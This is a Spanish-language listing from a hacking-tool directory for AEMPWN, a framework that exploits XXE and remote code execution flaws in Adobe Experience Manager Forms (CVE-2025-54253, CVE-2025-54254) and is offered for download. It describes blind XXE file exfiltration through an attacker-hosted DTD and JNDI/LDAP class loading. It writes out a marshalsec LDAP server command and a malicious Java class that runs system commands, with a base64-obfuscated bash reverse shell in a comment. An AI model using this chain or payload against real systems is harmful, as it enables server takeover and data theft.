Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
AEMPWN — CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE Framework | Kitploit
Herramientas/GitHubGitHub/zoomdbz/aempwn
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubzoomdbz/aempwn

AEMPWN

CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE Framework

Ver Repositorio
3hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

AEMPWN

Escáner de AEM Forms para CVE-2025-54253 y CVE-2025-54254

AEMPWN es un escáner específico para identificar vulnerabilidades de alto riesgo en Adobe Experience Manager (AEM) Forms, con soporte para detección segura, confirmación ciega fuera de banda (OOB) y flujos completos de validación de prueba de concepto (PoC). Esta herramienta está diseñada únicamente para pruebas de seguridad autorizadas.

Vulnerabilidades compatibles

CVE-2025-54253 Ejecución remota de código dependiente de la configuración en AEM Forms (JEE)

CVE-2025-54254 Inyección de entidad externa XML (XXE) que conduce a la divulgación de archivos y a una posible escalada

Modos de operación AEMPWN admite tres modos de ejecución para alinearse con los flujos de trabajo reales de bug bounty y red team.

  1. Modo PoC seguro (--poc)

Propósito: Identificar el comportamiento inseguro de análisis XML y la superficie de explotación viable sin desencadenar comportamientos destructivos.

Qué valida: Reflexión XML Respuestas estructuradas no HTML Reflejo de token canary Indicadores de manejo inseguro de XML

Úselo cuando: Desee realizar una validación de bajo ruido Todavía esté mapeando el impacto Necesite una señal segura antes de escalar Este modo es adecuado para el triaje temprano y los informes internos.

  1. Modo OOB XXE (--oob)

Propósito: Confirmar XXE ciego mediante solicitudes salientes del servidor AEM.

Aclaración importante: Burp Collaborator (o servicios similares) solo observa conexiones salientes. No: Aloja archivos DTD arbitrarios Sirve payloads maliciosos Devuelve respuestas controladas por el atacante Admite explotación LDAP/JNDI

Debido a esto, Collaborator por sí solo no es suficiente para la explotación completa de XXE OOB.

Lo que necesita: Un servidor HTTP que usted controle (VPS, instancia en la nube, servidor local con túnel, etc.) La capacidad de servir un archivo DTD La capacidad de observar solicitudes HTTP entrantes y parámetros de consulta

Lo que esto demuestra: El analizador XML recupera entidades externas El objetivo realiza solicitudes de red salientes Los archivos locales confidenciales pueden leerse y exfiltrarse

  1. Modo RCE (--rce)

Propósito: Demostrar la ejecución real de código en el servidor AEM para un impacto de nivel P1.

Este modo se basa en la inyección JNDI mediante el análisis XML, que requiere infraestructura más allá de las devoluciones de llamada HTTP.

Lo que necesita: Un servidor LDAP en ejecución capaz de servir una referencia de clase Java Un servidor HTTP que aloje una clase Java compilada Una primitiva de ejecución controlada (por ejemplo, creación de archivos, devolución de llamada saliente)

Por qué se requiere LDAP: El analizador XML intenta resolver una referencia JNDI Esto hace que el servidor AEM se conecte a su listener LDAP La respuesta LDAP apunta a una clase Java La clase es cargada y ejecutada por la JVM

Mejor herramienta: marshalsec

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-server/#Exploit" 1389

http://your-server/#Exploit = servidor HTTP que sirve Exploit.class (clase maliciosa compilada).

Ejemplo de clase maliciosa (simple touch /tmp/pwned o reverse shell):

root@kitploit:~
Javaimport java.io.IOException;
public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("touch /tmp/pwned");
            // or reverse shell: Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {}
    }
} 

Compile → alójela en el servidor HTTP (el mismo que el DTD o uno separado). Cuando AEM analiza la entidad → se conecta a su LDAP → obtiene la clase → ejecuta el código.

Limitación clave:

Burp Collaborator no puede: Servir respuestas LDAP Alojar clases Java Desencadenar la carga de clases basada en JNDI Por esta razón, el modo RCE no puede funcionar sin un servicio LDAP real.

Acerca de Burp Collaborator Burp Collaborator (y plataformas similares) son útiles solo para la detección.

Pueden confirmar: Consultas DNS Devoluciones de llamada HTTP o HTTPS Conectividad saliente ciega

No pueden: Alojar archivos DTD Procesar contenidos de archivos exfiltrados Servir clases Java Admitir explotación basada en JNDI o LDAP

Use Collaborator para observar, no para entregar payloads.

Salida:

Los hallazgos confirmados se escriben en un archivo de salida (por defecto: aem-forms-scan.txt) e incluyen: URL base del objetivo Endpoint afectado Señales de detección observadas Indicadores específicos del modo Apto para Video-PoC

Descargar herramienta